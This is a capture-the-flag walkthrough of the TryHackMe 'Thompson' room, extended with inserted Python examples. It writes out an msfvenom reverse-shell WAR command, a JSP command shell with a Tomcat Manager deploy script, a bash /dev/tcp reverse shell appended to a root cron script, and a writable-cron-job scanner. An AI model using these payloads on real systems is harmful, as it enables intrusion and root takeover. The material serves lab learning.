[THM] : Thompson Walkthrough

Suvam Adhikari
Jan 25, 2023

Initial Recon

# Nmap 7.92 scan initiated Wed Jan 25 17:21:06 2023 as: nmap -sCV -v -oN init.txt 10.10.19.163
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 25 17:29:56 2023 -- 1 IP address (1 host up) scanned in 529.87 seconds

We can see Tomcat 8.5.5 running on port 8080 (and its AJP connector on 8009). Requesting the Manager App and failing authentication gives a 403 Forbidden page that shows an example tomcat-users.xml entry; I tried the credentials from that example and they worked. With access to the Manager App we can deploy a WAR file containing a JSP reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.57 LPORT=9999 -f war -o evil.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Saved as: evil.war
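What actually goes into that WAR, and how it reaches Tomcat, as an added example in Python that is not part of the original post: it builds a minimal WAR (a zip holding WEB-INF/web.xml plus a JSP) and constructs the Manager text-API deploy request. It assumes the Manager account also has the manager-script role (the /manager/text interface requires it), and USER/PASSWORD are placeholders since the post does not quote the credentials. The JSP here is a command shell constructed for the example; an msfvenom-generated WAR such as evil.war can be deployed with the same request.

```python
"""Package a JSP as a WAR and deploy it through the Tomcat Manager text API.

Added example; these are not the walkthrough's commands. Assumptions:
- the Manager account has the manager-script role (the /manager/text API
  requires it; manager-gui alone only allows the HTML upload form);
- TARGET, USER and PASSWORD are placeholders for the room's host and the
  credentials shown on the 403 page, which this page does not quote.
"""
import base64
import io
import urllib.request
import zipfile

# Constructed payload: a minimal JSP command shell. An msfvenom-generated
# java/jsp_shell_reverse_tcp JSP would be packaged the same way.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# web.xml that makes GET /<context>/ run the JSP, so no file name is needed.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(jsp_name="cmd.jsp", jsp_source=CMD_JSP):
    """Return WAR bytes (a zip) containing WEB-INF/web.xml and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted entry names of a WAR, to sanity-check what will be deployed."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_request(base_url, context, war_bytes, user, password):
    """Build PUT /manager/text/deploy?path=<context> carrying the WAR as body.

    Returned unsent so it can be inspected; send with urllib.request.urlopen.
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return urllib.request.Request(
        f"{base_url}/manager/text/deploy?path={context}",
        data=war_bytes,
        method="PUT",
        headers={
            "Authorization": f"Basic {token}",
            "Content-Type": "application/octet-stream",
        },
    )


if __name__ == "__main__":
    TARGET = "http://10.10.19.163:8080"     # room host from the nmap scan
    USER, PASSWORD = "USER", "PASSWORD"      # placeholders, see docstring
    war = build_war()                        # or open("evil.war", "rb").read()
    resp = urllib.request.urlopen(deploy_request(TARGET, "/evil", war, USER, PASSWORD))
    print(resp.read().decode())              # Tomcat answers with an "OK - ..." line on success
    # then: curl "http://10.10.19.163:8080/evil/?cmd=id"
```

If the account only holds manager-gui, the text API answers 403; the same WAR can then be uploaded through the "WAR file to deploy" form on /manager/html, after which a request to /evil/ triggers the JSP (for the msfvenom payload, start the listener on LPORT first).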

After getting a shell, I found a file named id.sh in the user's home directory with the following content:

cat id.sh
#!/bin/bash
id > test.txt

/etc/crontab runs this script every minute as root, so test.txt contains the output of id for uid 0 rather than for our user. Since the script lives in the user's home directory and is writable by us, anything appended to it will also run as root:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh

So, with a listener waiting on port 4444 of our machine, I appended a reverse shell to id.sh; within a minute the cron job executed it and connected back as root. Note that the /dev/tcp redirection is a bash feature: the crontab sets SHELL=/bin/sh, but the job invokes bash id.sh explicitly, so it works here.

echo "/bin/bash -i >& /dev/tcp/10.17.6.57/4444 0>&1" >> id.sh
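The general check behind this privilege escalation, as an added Python example that is not part of the original post: parse the six-field system crontab format shown above, work out which files each root job would execute (resolving script arguments against a leading cd DIR &&, and bare command names against the crontab's own PATH), and report those writable by the current user. The sample crontab is constructed from the page's own entries; the interpreter list and the writability test hook are assumptions for this example.

```python
"""Flag /etc/crontab jobs that run as root but execute a file we can write.

Added example, not part of the walkthrough. It parses the six-field system
crontab format shown on the page (m h dom mon dow user command), resolves
script arguments against a leading "cd DIR &&", looks bare command names up
in the crontab's own PATH, and checks writability with os.access. The sample
crontab is constructed from the page's entries; INTERPRETERS is an assumed list.
"""
import os
import re
import shlex
import shutil

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root cd /home/jack && bash id.sh
"""

# Interpreters whose first non-option argument is a script file (assumed list).
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}


def parse_jobs(text):
    """Return (schedule, user, command) tuples for each job line in a system crontab."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def candidate_files(command, path_env=os.defpath):
    """Absolute paths of executables and scripts a crontab command would run.

    Approximation: "cd DIR" updates the cwd for later simple commands, even
    inside "( ... )" subshells; bare names are resolved through path_env.
    """
    cwd, paths = "/", []
    for simple in re.split(r"\s*(?:&&|\|\||;)\s*", command):
        try:
            argv = [a for a in shlex.split(simple) if a not in ("(", ")")]
        except ValueError:
            continue  # unbalanced quotes; skip this fragment
        if not argv:
            continue
        if argv[0] == "cd":
            cwd = argv[1] if len(argv) > 1 else "/"
            continue
        exe = argv[0]
        if "/" in exe:
            paths.append(os.path.normpath(os.path.join(cwd, exe)))
        else:
            found = shutil.which(exe, path=path_env)
            if found:
                paths.append(found)
        # "bash id.sh": the script is the interesting file, not the interpreter
        if os.path.basename(exe) in INTERPRETERS:
            scripts = [a for a in argv[1:] if not a.startswith("-")]
            if scripts:
                paths.append(os.path.normpath(os.path.join(cwd, scripts[0])))
    return paths


def writable_root_jobs(text, access=os.access):
    """(schedule, command, path) for root jobs that execute a file writable by us.

    `access` is injectable so the logic can be exercised without real files.
    """
    env = dict(re.findall(r"^(\w+)=(.*)$", text, re.M))
    hits = []
    for schedule, user, command in parse_jobs(text):
        if user != "root":
            continue
        for path in candidate_files(command, env.get("PATH", os.defpath)):
            if access(path, os.W_OK):
                hits.append((schedule, command, path))
    return hits


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for schedule, command, path in writable_root_jobs(f.read()):
            print(f"[{schedule}] root runs {command!r}; {path} is writable by us")
```

Run as the low-privileged user on the target, this reports /home/jack/id.sh for the last crontab entry; the same idea extends to /etc/cron.d and the run-parts directories, where a writable script or a writable parent directory gives the same result.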
